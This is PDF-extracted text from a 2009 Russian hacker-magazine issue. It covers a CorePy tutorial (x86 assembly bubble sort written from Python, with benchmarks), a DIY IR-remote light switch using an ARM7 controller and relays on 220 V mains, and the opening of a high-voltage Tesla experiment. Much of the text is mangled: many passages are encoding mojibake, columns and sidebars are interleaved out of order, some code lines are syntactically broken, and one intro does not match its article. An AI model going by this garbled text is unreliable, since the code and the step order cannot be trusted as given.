InstructionSream. Полученная последовательность передается 

на исполнение классу, представляющему абстракцию процессора. Внутренние 

механизмы CorePy парсят переданный нами InstructionStream 

и генерируют на его основе реальный машинный код. Теперь его можно 

вызывать почти как обычную функцию, обращаясь к нему через специальный 

интерфейс класса Processor. 

РУКИ ЧЕШУТСЯ РАБОТАТЬ 

Пришло время испытать эту штуку в боевых условиях! Давай реализуем 

какой-нибудь несложный алгоритм двумя способами: на ассемблере 

и на обычном Python, а затем сравним оба метода по скорости работы 

и удобству программирования. Для этих целей я выбрал всем знакомую 

задачу сортировки массива методом пузырька. Делаем огромный 

массив с тысячами элементов, заполняем его убывающей последова- 

XÀÊÅÐ 04 /124/ 09

coding 

ТУТ ОПЯТЬ ВСЕ МЕТОДЫ, НO N – МАЛО 

(0 < N

++++ 

>> coding 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

++++ 

Ìàøèííûé êîä, ñîçäàííûé 

CorePy íà 

îñíîâå íàøåãî 

# Platform: linux.spre_linux_x86_32 

BITS 32 

SECTION .text 

global bubble_sort 

bubble_sort: 

PROLOGUE: 

push ebp 

mov ebp, esp 

push edi 

push esi 

push ebx 

BODY: 

BEGIN_ALL: 

mov esi, 0 

mov ecx, 0 

BEGIN_LOOP: 

mov edi, dword [ebp + 8] 

mov eax, dword [edi + ecx * 4 + 0] 

mov ebx, dword [edi + ecx * 4 + 4] 

cmp eax, ebx 

jle LE 

mov esi, 1 

mov dword [edi + ecx * 4 + 0], ebx 

mov dword [edi + ecx * 4 + 4], eax 

LE: 

inc ecx 

cmp ecx, dword [ebp + 12] 

je END_LOOP 

jmp BEGIN_LOOP 

END_LOOP: 

cmp esi, 0 

jne BEGIN_ALL 

EPILOGUE: 

pop ebx 

pop esi 

pop edi 

leave 

ret 

Êîä íàøåé 

ôóíêöèè 

íà CorePy 

import corepy.arch.x86.isa as x86 

import corepy.arch.x86.platform as env 

from corepy.arch.x86.types.registers import * 

from corepy.arch.x86.lib.memory import MemRef 

code = env.InstructionStream() 

lbl_begin = code.get_label('BEGIN_ALL') 

lbl_loop = code.get_label('BEGIN_LOOP') 

lbl_le = code.get_label('LE') 

lbl_end = code.get_label('END_LOOP') 

is_finish = esi # ôëàã çàâåðøåíèÿ 

x86.set_active_code(code) 

# Ïðèíèìàåì ÷åðåç ñòåê äâà ïàðàìåòðà: íà÷àëüíûé àäðåñ ìàññèâà 

è ìàêñèìàëüíûé äîïóñòèìûé èíäåêñ â íåì 

code.add(lbl_begin) 

x86.mov(is_finish, 0) 

x86.mov(ecx, 0) 

code.add(lbl_loop) 

# Çàíîñèì â edi àäðåñ íà÷àëà ìàññèâà 

# Îí âñåãäà ñîñòîèò èç 4áàéòíûõ öåëûõ ÷èñåë 

x86.mov(edi, MemRef(ebp, 8)) 

x86.mov(eax, MemRef(edi, disp=0, index=ecx, 4) 

x86.mov(ebx, MemRef(edi, disp=4, index=ecx, 4) 

# Åñëè ïîðÿäîê ñîðòèðîâêè íàðóøåí... 

x86.cmp(eax, ebx) 

x86.jle(lbl_le) 

# ìåíÿåì ýëåìåíòû ìåñòàìè 

x86.mov(is_finish, 1) 

x86.mov(MemRef(edi, disp=0, index=ecx, 4), ebx) 

x86.mov(MemRef(edi, disp=4, index=ecx, 4), eax) 

code.add(lbl_le) 

x86.inc(ecx) 

x86.cmp(ecx, MemRef(ebp, 12)) # óæå êîíåö? 

x86.je(lbl_end) 

x86.jmp(lbl_loop) 

code.add(lbl_end) 

++ ++ 

++++ 

++++ 

++++ 

примере это code). Затем с помощью метода add в него заносятся конкретные 

команды, например: 

code.add(x86.mov(eax, 0)). 

Мы добавили к командам из code операцию обнуления eax. Примерно 

так и составляется вся программа. x86 — это псевдоним для соответствующей 

ISA. Для того чтобы все время не писать code.add(команда), можно 

просто вызвать функцию x86.set_active_code(code) для экземпляра 

твоей ISA. После этого все создаваемые инструкции будут автоматически 

добавляться к code. Названия и структура параметров команд 

полностью совпадают с ассемблерными аналогами, поэтому запомнить 

их не составляет труда. Для работы с регистрами импортируй все имена 

из corepy.arch.x86.types.registers. Далее в параметрах команд просто 

пиши, что нужно: eax, bp и т.д. Здесь есть одна хитрость: регистры — это 

обычные объекты. Поэтому для них можно вводить псевдонимы. В примере 

я ввел альтернативное имя is_finish для esi. Такой подход облегчает 

# Åñëè íå áûëî íè îäíîé ïåðåñòàíîâêè, òî ìàññèâ îòñîðòèðîâàí 

x86.cmp(is_finish, 0) 

x86.jne(lbl_begin) 

восприятие, как правило, сильно запутанных ассемблерных программ. 

Механизмы адресации традиционно считаются сложным аспектом в 

программировании на ассемблере. Действительно, x86 поддерживает 

несколько ее типов: прямая, косвенная, базовая, индексная, со смещением 

и т.д. В этих разновидностях немудрено заблудиться. Для формирования 

указателей на ячейки памяти CorePy предоставляет удобный 

класс MemRef (передается как параметр соответствующим конструкторам 

команд), который может заметно облегчить работу и повысить 

визуальную наглядность кода. Например: MemRef(0xABCD) — указатель 

на абсолютный адрес, MemRef(rip, -1024) — указатель на ячейку памяти, 

смещенную относительно IP, MemRef(rsi, disp = 0, index = rcx, scale = 4) 

— эффективный адрес = base + (index * scale) + disp (индексная базовая 

адресация со смещением). Последний случай используется в примере. 

++++ 

096 

XÀÊÅÐ 04 /124/ 09

coding 

абсолютно прозрачно для программиста. Иногда очень удобно использовать 

средства Python для автоматизации создания потоков команд. Ты 

можешь написать программы, которые будут автоматически генерировать 

последовательности ассемблерных инструкций. В примерах, которые идут с 

CorePy, можно встретить такие участки кода: 

for i in xrange(0, 65): code.add(x86_isa.pop(edi)) 

Здесь вместо того, чтобы заниматься copy and paste, разработчики написали 

цикл, который создает 65 pop-инструкций, идущих друг за другом. Я 

думаю, развив эту идею, можно сделать библиотеку удобных макросов — 

и использование старого доброго asm’а станет еще комфортнее. 

Emacs представляет собой одну из лучших сред программирования, 

особенно, если приходится одновременно работать с несколькими языками 

Редкая программа выполняется линейно и может обойтись без меток для 

переходов. Объекты меток в CorePy создаются классами InstructionStream 

— выглядит приблизительно так: lbl_loop = code.get_label(«LOOP»). Здесь 

lbl_loop — это новая метка, а code — поток команд. Если у code запросить 

еще одну метку с именем «LOOP», вернется тот же экземпляр. Для использования 

созданной метки ее нужно поместить в код. Это очень просто: 

code.add(lbl_loop) добавляет метку на текущую позицию в коде. Концепция 

раздельного создания и использования меток может показаться странной, 

но она необходима для организации прыжков на метки, которые идут впереди 

по коду. Если ты изучил ассемблерный листинг нашей программы, 

то наверняка обратил внимание, что CorePy разделяет каждую функцию 

на три части и вводит предопределенные метки: PROLOGUE, BODY и 

EPILOGUE. Все, что мы пишем, попадает в главную часть — BODY. Код 

эпилога и пролога генерируется автоматически. Он нужен для обеспечения 

бинарного интерфейса между функцией и внешним миром. Наличие 

такой автоматизации — еще одно преимущество CorePy: теперь программист 

тратит меньше сил на реализацию рутинных вещей, таких как 

инициализация регистра bp указателем на вершину стека и т.п. 

CorePy использует стек для передачи параметров в функции. На стороне 

Python-кода для этого нужно использовать специальный класс ExecParams. 

У него есть восемь полей: p1, p2, ... , p8 — каждое соответствует одному из 

восьми параметров, которые можно передать в функцию. Такой объект 

передается экземпляру класса Processor во время запуска процедуры. Из 

ассемблера доступ к параметрам осуществляется по старинке: через смещение 

относительно указателя начала стека. Чтобы, например, скопировать 

первый параметр в eax, напиши следующее: x86.mov(eax, MemRef(ebp, 16)). 

Для возврата значений из функций используется регистр с предопределенным 

именем. Обычно это gp_return. Разумеется, ассемблер имеет смысл 

применять для обработки больших массивов данных — только в этом случае 

можно увидеть повышение быстродействия. Но много информации через 

регистры и стек в функцию не передашь, и эта проблема имеет отдельное 

решение. Например, можно пользоваться классом array из стандартной 

библиотеки. Это обычный динамический гомогенный массив для Python. 

Среди встроенных типов есть только гетерогенные списки, но они неэффективны 

при работе с большими блоками однотипных элементов. К тому 

же, они не предоставляют прямого доступа к памяти, а это нужно для работы 

ассемблерного кода. Поэтому и появился класс array — у него есть метод 

buffer_info(), возвращающий адрес начала массива и количество элементов 

в нем. Этот адрес можно использовать напрямую из ассемблера, в своем 

примере я так и сделал. CorePy предоставляет похожий класс с почти 

идентичным интерфейсом — extarray. В отличие от стандартного array, он 

всегда выделяет память, выравненную по границам страниц. За счет такой 

оптимизации твои программы будут работать максимально эффективно. 

Плюс, на Linux поддерживается технология huge pages, и ее использование 

XÀÊÅÐ 04 /124/ 09 

АНАЛИЗИРУЕМ РЕЗУЛЬТАТЫ 

Выходит, ассемблерная версия рвет обычную на несколько порядков! 

Мы получили выигрыш от тысячи до десяти тысяч раз по скорости 

при использовании одинакового алгоритма, и с ростом количества 

элементов в массиве этот отрыв становится все заметнее. На графиках с 

четырьмя кривыми я вывел зависимость логарифма времени выполнения 

от количества элементов. Я провел два эксперимента с малым и 

большим N (до тысячи и до семи тысяч) — на графиках с двумя линиями 

выводятся абсолютные величины и сравниваются методы с приблизительно 

одинаковым порядком производительности. На одном показано 

время выполнения Python-реализации с PsyCo-оптимизацией и без. 

Видно, что PsyCo работает, но в этом тесте эффект, все же, не слишком 

убедителен — кривые идут почти одна под другой. На другом графике 

мы наблюдаем стандартную функцию sort против нашей ассемблерной 

реализации — sort работает приблизительно на один порядок быстрее 

с нашим количеством элементов, но заметна тенденция к увеличению 

этого разрыва. Связано это с тем, что встроенные функции пишут на C, и 

они обычно очень хорошо оптимизированы. И конечно, там используется 

алгоритм с меньшей сложностью, чем n**2, как у нашей bubble sort :). 

ПОДВЕДЕМ ИТОГИ 

Позволяя писать низкоуровневые процедуры прямо в Python-коде с 

использованием его синтаксиса, CorePy снижает порог вхождения в 

машинное программирование до минимума. На официальном сайте 

приведена цитата одного из пользователей. Он говорит, что CorePy опять 

сделал программирование на ассемблере увлекательным и веселым 

занятием. Библиотека логична и последовательна, ее освоение не 

займет много времени, а от комфортного программирования получаешь 

почти феерическое удовольствие :). Количество программ, используемых 

в рабочем процессе, при этом не увеличивается. Ты по-прежнему 

работаешь с одним Python-интерпретатором, а значит, не нужно читать 

документацию к незнакомым компиляторам и другим утилитам, которыми 

ты никогда не пользовался (или пользовался, но давно). Это может 

служить хорошим стимулом для использования CorePy в промышленном 

программировании. Библиотека найдет применение в самых разных 

областях: встраиваемые приложения, научные расчеты, производство 

игр — и так далее. Отличная технология! z 

Çàïóñê 

íàøåé ñîðòèðîâêè 

import corepy.arch.x86.platform as env 

proc = env.Processor() 

params = env.ExecParams() 

def sort(array): 

bi = array.buffer_info() 

# Ïîäãîòîâêà ïàðàìåòðîâ 

params.p1 = bi[0] 

# Íà÷àëî ìàññèâà 

params.p2 = bi[1] — 1 

# Êîëè÷åñòâî ýëåìåíòîâ 

proc.execute(code, params = params)# Çàïóñê asm — êîäà! 

097

phreaking 

ЕВГЕНИЙ «VSHMUK» БЕЙСЕМБАЕВ 

/ DIVER@EDU.IOFFE.RU / 

ИНФРАКРАСНАЯ ЛЕНЬ 

Управлять с пульта можно не только телевизором 

Устав вставать с дивана, чтобы в очередной раз выключить свет 

в комнате, я задумался, как можно облегчить себе жизнь. Взгляд упал 

на инфракрасный пульт управления от старого телевизора. 

«Почему бы не поуправлять светом с его помощью?» — подумал я. 

И взялся за реализацию идеи. 

>> phreaking 

Конечно, в продаже есть нормальные, «цивильные» системы дистанционного 

управления светом в комнатах. Обычно они идут в комплекте, 

— как части разрекламированного «умного дома». Но мы же хакеры? 

Поэтому будем делать умный дом своими руками, что в разы дешевле и 

интереснее. 

ПУЛЬТ 

Понадобится нам всего ничего: ИК-пульт (подойдет практически любой), 

микроконтроллер, ИК-датчик и так называемые твердотельные реле. 

К цифровой ножке контроллера привесим ИК-датчик, который, поймав 

из эфира нужные данные, отошлет на реле импульс включения/выключения. 

Начнем с пульта. Любой ПДУ для нас, как электронщиков, имеет две 

характеристики. Это частота модуляции, так называемая несущая, и метод 

кодирования сигнала. С частотой все просто — это то, насколько 

быст ро «моргает» излучатель. Как правило, попадаются частоты 36 

кГц, 38 кГц и 40 кГц. А вот с методами модуляции придется повозиться, 

так как каждый производитель использует свой протокол. Не 

факт, что метод кодирования, использовавшийся на моем пульте, 

подойдет к твоему. Лично я тыкал в кнопки и смотрел сигнал с 

приемника на осциллографе. У тебя осцильника может и не быть, 

но информация в интернете по протоколам разных производителей 

ищется очень легко. В любом случае — подробнее по ним читай 

далее, в отдельной главе. Не забудь проверить пульт на признаки 

жизни, это сэкономит немало нервов. Направь на него объектив цифровой 

камеры своего мобильника и понажимай кнопочки. Матрица камеры 

воспримет излучение работающего пульта как ярко-синее, почти белое. 

бы один, поверь, для него найдется применение в любой задаче. 

Конкретно в нашем случае, такая примитивная функция, как расшифровка 

сигнала с пульта и воспроизведение некоторых действий, 

могла бы решиться намного более простым 8-битным контроллером, 

а использование AT91SAM7X — пушка в вопросе обстреливания 

воробьев. Но за дешевизной мы не гонимся, а гонимся за удобством 

программирования, наглядностью и переносимостью на другие проекты. 

Итак, контроллер в нашей задаче должен иметь, как минимум: 

• Один логический вход, куда мы будем подключать ИК-сенсор; 

• Один логический выход, где будет висеть реле для включения света в 

комнате. Если хочешь сделать контроллер «умнее», то на досуге приделай 

к нему ЖК-дисплей с выводимой информацией (для управления ему 

понадобится еще около 8-ми логических выводов); 

• Из периферии — один таймер для замера задержек. 

ДАТЧИК 

Также понадобится ИК-датчик на нужную тебе несущую частоту. Добывается 

он в магазинах электроники, барахолках или в старых телевизорах/ 

видиках. Скорее всего, называться он будет Vishay TSOP18XX (на XX кГц). 

Питается от 5 или 3,3 В, внутри имеет все необходимые фильтры и усилители, 

а на выход отдает уже нормальный логический сигнал, который 

можно без посредников заводить на логическую ножку микросхемы. 

Датчик выбирай совместимым по несущей частоте с твоим ПДУ. Настроенный 

на другую частоту тоже будет работать, но только если светить в 

него в упор. У моего Sony RM-836 несущая равна 36 кГц, соответственно, 

и сенсор я купил TSOP1836, — он наиболее часто используемый. 

КОНТРОЛЛЕР 

Схему я делал на оказавшемся под рукой Atmel AT91SAM7X128. Это 

очень крутой МК архитектуры ARM7. Главный его плюс — не нужен 

программатор: контроллер замечательно шьется через встроенный 

USB-порт. А вообще, «Атмелы» всегда славились продвинутой периферией 

в своих контроллерах. Поэтому советую приобрести хотя 

098 

РЕЛЕ 

Наша задача — рулить довольно мощной и питающейся от большого 

напряжения нагрузкой (освещением в комнате, например). Естественно, 

слабый и работающий от 3,3 В микроконтроллер не сможет зажечь 

лампочку, да и 220 вольтам в нашей схеме пока что взяться неоткуда. Для 

решения таких задач и были придуманы реле (от relay — «эстафета»). Эти 

XÀÊÅÐ 04 /124/ 09

phreaking 

Так выглядит наше реле с двух сторон и со снятым радиатором. 

Радиатор с термопастой — для задач типа «руление 

пылесосом» 

Вот что видно на осциллографе. Последовательность читается 

довольно легко 

Светим пультом прямо в глаз 

XÀÊÅÐ 04 /124/ 09 

099

pc_zone phreaking 

+5V 

Почти собранные модули, 

— не впаян только 

драйвер 

~220V 

Реле 

Нагрузка 

РЕЛЕ И ДРАЙВЕРЫ 

MCU 

100 

5 Ohm 

N-type 

MOFSET 

ВНУТРЕННОСТИ 

СЕНСОРА 

PIN 

Input 

AGS 

Control 

Circuit 

Band 

Pass 

Инфракрасный датчик — довольно сложное устройство. 

Для начала, в нем есть фотодиод, реагирующий на ИК-часть 

спектра. Напрямую аналоговый сигнал с фотодиода на 

контроллер посылать не имеет смысла — он просто все 

свободное время будет оцифровывать картинку и пытаться 

извлечь из нее данные. Поэтому в датчик уже включены 

фильтры и демодулятор, дергающий, в итоге, за базу 

транзистора. Как только поймается единица, транзистор 

откроется, и вывод OUT закоротится с землей GND — тогда 

контроллер видит переход состояний и запускает прерывание. 

Denodulator 

30 

3 

1 

2 

V s 

OUT 

GND 

Несмотря на плюсы твердотельных реле, минусов у них тоже 

более чем достаточно. 

Во-первых, ток управления в большинстве случаев требуется 

такой, какой ножка микроконтроллера выдать не в состоянии 

— просто сгорит. Во-вторых, многим релюшкам требуется 

5 В на включение, тогда как МК твой выдает только 3,3 В (по 

спецификации CMOS). В общем, я тебе категорически не 

рекомендую подключать релюшку напрямую к контроллеру, 

даже если тока с напряжением достаточно. Правильнее и 

дешевле — включать его через полевой транзистор! Для 

наших задач подойдет любой, например, IRML2803 фирмы 

International Rectifier. 

Теперь о том, как выбрать реле. Первая попавшаяся релюшка 

KSD210AC8 фирмы Cosmo Electronics уже подходит нам (http:// 

cosmo-ic.com/object/products/KSD210AC8.pdf). Управляется, 

минимум, 4 вольтами, поэтому надо добыть 5 или 12 вольт, но на 

плате они всяко есть. 

То, что управляет чем-то мощным (у нас это — реле), по терминологии 

зовется драйвером. В данном случае драйвер — просто 

полевой транзистор. 

Вместо обычного транзистора можно использовать его же, но с 

опторазвязкой, так во многих случаях безопаснее и правильнее, 

несмотря на наличие развязки уже внутри релюшки. 

Еще совет. Выбирай себе реле с максимальным выходным 

током в 2-3 раза больше, чем тот, с которым оно будет использоваться. 

Иначе — готовься к тому, что в шкафу будет адский 

кипятильник! 

приборы могут малыми силами замыкать и размыкать схему, по которой 

течет большой ток. Классический вариант — электромагнитное реле 

(с магнитом внутри, коммутирующим нашу цепь притягиванием к себе 

так называемого якоря). Вообще, термином «реле» можно с натяжкой 

обозвать любой выключатель, даже тот, что висит на стенке, приводится 

в действие рукой и включает освещение. У электромагнитных реле 

есть недостаток. Из-за наличия движущихся частей и электромагнита 

сами релюшки будут требовать немаленькое напряжение и потреблять 

нехилый ток, который микросхема выдать не в силах. Делать всякие мегаусиления 

не будем, а воспользуемся так называемыми твердотельными 

реле. Они требуют на вход TTL (3,3-5 В) логику и могут коммутировать 

переменные токи до нескольких ампер. Внешне они могут выглядеть 

как обыкновенные MOSFET-транзисторы с местом для прикручивания 

радиатора, а внутри являются тиристорами в паре (смотри врезку). 

В нашей лаборатории уже есть реле, сделанные из тиристоров 25TTS фирмы 

Vishay (http://www.vishay.com/docs/94384/94384.pdf). Ты тоже можешь подобрать 

себе подобное в магазинах/на барахолках, только следи за максимальным 

пропускаемым током (Мощность лампочки=Ток*Напряжение, не забыл?), 

а также — возможностью работать с переменным напряжением и минимальным 

током на затвор. Полагаю, придется привесить на вход реле еще один 

транзистор, но это не больно :). В общем, микроконтроллер в нужный момент 

будет подавать на реле (через транзистор или оптотриак) логическую единицу 

(3,3 В), а реле — пропускать через себя 220 В переменного тока. 

ПРОТОКОЛЫ 

Если частоты модуляции в ИК-пультах хоть как-то стандартизированы, 

то с протоколами что-то не сложилось. Любая компания-производитель 

выдумывает свои собственные. «Низкоуровневых» протоколов распространено 

два. Это RC5 (так называемый манчестерский код), использующийся 

Philips, и Sony, изобретенный фирмой Sony. Протокол Манчестера 

часто используется в линиях передачи данных, когда увеличение заряда 

или «яркости» линии чревато «ослеплением» сенсора (подробнее — 

смотри врезку). Вкратце, единица представляется переходом из 1 в 0, а 

ноль — из 0 в 1. Протокол Sony, в отличие от RC5, не кодирует данные переходами 

из состояния в состояние, а использует для этого их длительности 

(!). Например, сначала идет одиночный импульс «1», а потом, в зависимости 

от передаваемого, одиночная или двойная пауза (вообще, что 

считать паузой, а что импульсом — вопрос спорный, транзистор внутри 

сенсора все равно все инвертирует). Скажем, единица будет выглядеть 

как «1-0-0», а ноль — как «1-0». С «высокоуровневыми» протоколами — в 

разы сложнее. Поверх низкоуровневых модуляций уже передаются те 

самые данные, которые и отличают одну нажатую кнопку от другой. Здесь 

советовать что-либо трудно, количество стартовых/стоповых бит, LSB/ 

MSB очередности и разделение команды-данные всегда будет свои. 

Тычь осциллографом в сенсор, изучай передаваемые данные, ну и про 

XÀÊÅÐ 04 /124/ 09

phreaking 

ПРОТОКОЛЫ 

МАНЧЕСТЕР И EFM 

Допустим, тебе надо по очень длинной линии с кучей помех 

(неважно, оптическая она или просто медный провод) передать 

кучку единиц. Стартовые и стоповые биты не спасут от обилия 

сигналов с «высоким уровнем», и датчик/триггер на том конце линии 

просто перестает адекватно воспринимать данные. Поэтому 

для сред с высоким уровнем помех используются так называемые 

self-clocking модуляции. 

Например, в протоколе Manchester (используется в Ethernet) единица 

дополняется нулем, а ноль — единицей, поэтому значений 

с высоким уровнем на линии столько же, сколько и с низким. К 

тому же, так мы сохраняем заряд кабеля. Приемник всегда может 

подстроиться на частоту и амплитуду сигнала, и в итоге — потерь 

данных меньше. 

Что-то подобное используется и в кодировании данных на CD- 

ROM, где 8 бит каждого байта по таблице переводятся в избыточные 

14 с тем принципом, что любые две единицы разделяются, 

минимум, двумя и, максимум, десятью нулями. Вместе с дополнительными 

тремя битами, склеивающими байты, мы получаем 

равномерно «серую» поверхность диска, поэтому сенсор всегда 

явно различает темные (темнее серого) и светлые (светлее серого) 

участки. 

Википедия предлагает небольшие обзорные статьи по теме: 

• http://en.wikipedia.org/wiki/Manchester_code. 

• http://en.wikipedia.org/wiki/Eight-to-Fourteen_Modulation. 

Google тоже забывать не стоит. Полагаю, протоколы для большинства 

пультов уже расшифрованы и лежат в открытом доступе. Будешь читать 

алгоритм — не путай низкоуровневые нули и единицы (свечение pulse и 

space) с логическими, получаемыми после расшифровки. 

îêàçàëèñü. Åñëè ÷åðåç 1.2 ìñ, òî ê íàì ïðèåõàëà åäèíèöà, 

à åñëè ÷åðåç 0.6 — òî íîëèê. Çàïèõèâàåì åãî â «êîìàíäíûé» 

áàéò íîãàìè âïåðåä (LSB) è èäåì öèêëîì â ìåòêó [Ìåòêà!]. 

— Êàê ïðèíÿëè 7 êîìàíäíûõ áèò, ïðèíèìàåì 5 àäðåñíûõ. 

— Ïî ïðîòîêîëó ÷åðåç 40 ìêñ ïóëüò ïîâòîðÿåò ïîñëåäîâàòåëüíîñòü, 

ïîýòîìó åñëè õî÷åøü äîïîëíèòåëüíîé íàäåæíîñòè 

— ïðèñòóïàé ê äåéñòâèþ òîëüêî ïîñëå âòîðîé ïîâòîðåííîé 

êîìàíäû. 

— Íó, à åñëè âñå áèòû ñîâïàëè ñ òåì, ÷òî ìû îæèäàåì, òî 

ïðîèçâîäèì äåéñòâèå (íàïðèìåð, ïèùèì ëàìïî÷êîé). 

Как-то так. Страшно, но в готовом коде букв будет в разы меньше. 

СБОРКА И ИСПЫТАНИЕ 

У меня уже была отладочная плата на контроллере ARM7. Вся периферия 

— отключена, к одному цифровому входу была привешена OUT-ножка 

датчика, а к выходу я временно привесил динамик-пищалку, чтобы не 

играться с высоким напряжением раньше времени. Datasheet порекомендовал 

мне привесить конденсатор 4.7 мкФ между питанием и землей 

датчика, ну а я был как бы не против. Затем я щупал осциллографом 

выход ИК-датчика, тыкал в кнопки пульта и пытался найти соответствие 

между протоколом и видимым мной на экране. После некоторых правок 

и перезаливок кода динамик стал наконец-то пищать, сообщая, что 

контроллер распознал мои нажатия. 

АПЛОДИСМЕНТЫ! 

Теперь ты можешь управлять с обыкновенного пульта дистанционного 

управления любой техникой в доме. Одной релюшкой с лампочкой все, 

естественно, не ограничивается, и ты волен привесить на контроллер 

какие угодно функции, хватило бы фантазии и усидчивости. Да, минусы 

в моем проекте тоже есть. Во-первых, устройство не умеет снаружи 

конфигурироваться через USB или UART. Захочешь поменять кнопку, на 

которую будет реагировать контроллер, — перекомпилируй и перепрошивай 

все по новой. Сам контроллер тоже слишком крут для таких задач. 

Я его выбрал за универсальность, но в готовом «серийном» устройстве, 

висящем в шкафу на стенке, понятно, придется использовать что-нибудь 

подешевле. Надеюсь, сидя на диване и руля техникой в доме, ты не 

заработаешь геморрой. Мой тебе совет, пока не поздно — выбрось пульт 

вместе с телевизором в окно и иди гулять. Весна, как-никак. z 

АЛГОРИТМ 

У меня оказался пульт от телевизора Sony ХХХ, поэтому прошивку для контроллера 

я писал, исходя из местного протокола. За «единичный интервал» 

берем 0,6 мс, тогда стартовый ноль — это 4 интервала, единица занимает 

1+2 интервала, а ноль — 1+1. Последовательность действий в моем случае 

примерно такова: 

— Ñòàâèì ïðåðûâàíèå íà ñðàáàòûâàíèå â 0 (êîãäà äàííûå íå 

ïåðåäàþòñÿ, òðàíçèñòîð â äàò÷èêå çàêðûò, íà íîæêå åäèíèöà). 

— Îêàçàâøèñü âíóòðè ïðåðûâàíèÿ, ñáðàñûâàåì è çàïóñêàåì 

òàéìåð. 

— Ñòàâèì ïðåðûâàíèå íà 1. Ñòàðòîâûé íîëü äîëæåí áûòü äëèíîé 

2.4 ìñ. 

— Âíóòðè ïðåðûâàíèÿ çàìåðÿåì, ñêîëüêî íàòèêàë òàéìåð: 

— Åñëè íàòèêàëî îêîëî 2.4 ìñ, òî ìû ïîéìàëè ïîëåçíûå äàííûå; 

— Åñëè íåò, òî ïîéìàëè ÷òî-òî íå òî. 

— [Ìåòêà!] Â ëþáîì ñëó÷àå, ñòàâèì ïðåðûâàíèå ñíîâà íà 0, 

äà ê òîìó æå ñáðàñûâàåì ñ÷åò÷èê (åñëè ïðîäîëæàåì ïðèíèìàòü 

ïàêåò). 

— Ñðàáîòàòü îíî äîëæíî ïðèìåðíî ÷åðåç 0.6 ìñ. Åñëè ïðåðûâàíèå 

íàñòàëî ÷åðåç äðóãîé ïðîìåæóòîê âðåìåíè, òî ñáðàñûâàåì 

ñîñòîÿíèå. À åñëè ÷åðåç 0.6, — òî ìû ïîéìàëè îäèíî÷íóþ 

åäèíèöó. Ñëåäóþùàÿ ïîñëåäîâàòåëüíîñòü íàêîíåö-òî 

ñîîáùèò íàì, ÷òî èìåë â âèäó ïóëüò. Ñáðàñûâàåì ñ÷åò÷èê è 

ñòàâèì ïðåðûâàíèå íà 1. 

— Â íåì ñìîòðèì, ÷åðåç êàêîé ïðîìåæóòîê âðåìåíè ìû òóò 

XÀÊÅÐ 04 /124/ 09 

АППАРАТНЫЕ 

ПРЕРЫВАНИЯ 

Любое ядро любого процессора как-то должно реагировать на 

внешние раздражители, например, на приход сигнала с какойнибудь 

ножки. Первый способ — банально написать программу, 

периодически опрашивающую периферию на предмет изменения 

состояния. Но это затратно, несинхронно и, вообще, немодно. Поэтому 

еще на заре компьютеростроения был изобретен механизм 

прерываний. Специальный периферийный контроллер содержит 

список функций (обработчиков), на которые нужно совершать переход, 

если произошло какое-либо событие. Если оно происходит, 

контроллер прерываний насильно сохраняет текущие значения 

регистров в стеке и перебрасывает процессорное ядро на новый 

адрес с обработчиком. Последний исполняется и сбрасывает флаг 

прерывания, сообщая, что оно обработано и можно двигаться 

дальше. 

101

phreaking 

ВАДИМ ДАНЬШИН «DOCTOR V_M_E_N» 

/ YURIK_YUROK2@MAIL.RU / 

ГРОМ И МОЛНИИ 

Эксперимент по передаче энергии на расстояние 

Все вокруг считают, что такую вещь, как плазма, без дорогостоящего 

коллайдера получить нереально. На самом деле, это не так. Сейчас ты 

поймешь, как с помощью хакерского моддинга можно легко и просто 

повысить рабочие характеристики своего автомобиля. 

>> phreaking 

Началось все со слуха, что какой-то там Apple умеет заряжаться в 

пределах комнаты беспроводным путем. Меня это весьма удивило, 

а потому я захотел узнать, насколько реально самому сделать такой 

уникальный девайс. Интерес понятен — я более чем уверен, что и 

твой мозг уже взволнован тысячами возможностей применения 

данного устройства в хакерском быту. Только представь — зарядка 

«жуков», сотовых телефонов, да и вообще, создание специальных 

площадей в доме, где техника сама бы централизованно подзаряжалась. 

После того, как первые впечатления от услышанной новости 

малость утихли, я полез гуглить. И первым делом наткнулся на 

небезынтересную работу под названием «Ручная плазма» — на сайте 

журнала по ссылке http://www.xakep.ru/post/22867/default.asp. В этой 

статье было представлено относительно простое и изящное решение 

проблемы. Я мигом побежал в магазин за деталями, купил резисторы, 

транзистор, гигантский радиатор с еще тремя подходящими 

транзисторами в придачу — все по списку. А вот рабочий строчник я 

зачем-то дернул из горелой платы советского телика и, как выяснилось 

позже, сделал это зря. Тем не менее, схема работала даже в моем 

отвратительно-пофигистическом исполнении и что-то даже пыталась 

выдавать. Оказывается, для системы отлично подходят старинные 

строчники ТВС-110ЛА. Также во время походов по магазинам я наткнулся 

на катушку дважды лакированной тонкой медной проволочки 

толщиной 0.1 мм. Цена вопроса сложилась из: 

— Êàòóøêà ïðîâîëîêè (1-1.5 êì) — 700 ðóá. 

— 6 òðàíçèñòîðîâ + ðàäèàòîð — 800 ðóá. 

— Êóñîê êàíàëèçàöèîííîé ïëàñòèêîâîé òðóáû — 0 ðóá. (íàøåëñÿ 

â ïîäâàëå) 

— Êîíäåíñàòîðû, äèîäû è ðåçèñòîðû — 200 ðóá. 

— Ñòðî÷íèê ÒÂÑ-110ËÀ â èñòèííî ñîâåòñêîé óïàêîâêå — 90 ðóá. 

Итого, имеем на руках почти полный боекомплект, необходимый, чтобы 

начать опыты по передаче энергии на расстояние. Но прежде, уважаемый 

читатель, советую погуглить в инете на эту тему, а также про 

трансформатор Тесла и законы Кирхгофа. Погуглил? Тогда читай дальше: 

102 

еще в 1890-х годах Никола Тесла произвел интересную демонстрацию на 

озере (http://www.mirf.ru/Articles/art716.htm), в ходе которой люди наблюдали 

дистанционное управление плавающим средством — кораблик 

подчинялся хитрым манипуляциям Теслы. А ведь тогда не то что приемников 

не было — даже транзисторов не существовало! Собственно, 

потому и уважают Теслу, что он методом камня и топора делал неописуемые 

для тех времен вещи. 

А ТЫ ИГРАЛ В HL2? 

Если играл, то помнишь голубенькие барьеры, которые питались 

током. Давай сейчас, на примере простого опыта, поймем, как можно 

растянуть электрическое поле по довольно большой площади. Для 

этого построим следующую конструкцию. Возьмем обычную (желательно, 

не грязную:)) автомобильную свечку. Спилим боковой 

электрод, и затем подключим к ней трансформатор высокочастотного 

высоковольтного напряжения. Подключил? Если все сделал правильно, 

то сможешь наблюдать множественные искорки от центрального 

контакта к боковым стенкам. 

Теперь делаем неожиданный финт — крепим по бокам свечки обыкновенные 

ниодимовые магниты (подробнее о них я писал в февральской статье). 

